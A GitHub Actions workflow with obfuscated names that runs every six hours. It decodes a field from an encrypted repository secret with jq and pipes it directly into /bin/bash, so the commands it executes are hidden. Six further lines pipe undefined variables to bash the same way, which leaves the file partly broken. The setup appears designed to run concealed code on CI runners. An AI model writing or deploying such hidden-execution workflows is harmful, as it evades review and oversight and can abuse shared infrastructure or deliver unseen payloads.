name: fengsidou0987

on:
  workflow_dispatch:
  schedule:
    - cron: '33 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: fengsidou0987
        env:
          oxyjm9084: ${{ secrets.oxyjm9084 }}
        run: |
          echo $oxyjm9084 | jq -r .it0943 | /bin/bash
          echo $bof52319 | jq -r .xdcxg99 | /bin/bash
          echo $zk9 | jq -r .xto636 | /bin/bash
          echo $q46865 | jq -r .zw3 | /bin/bash
          echo $guttb878 | jq -r .hc007 | /bin/bash
          echo $zeohm47 | jq -r .g46 | /bin/bash
          echo $art5792 | jq -r .nlsd2421 | /bin/bash

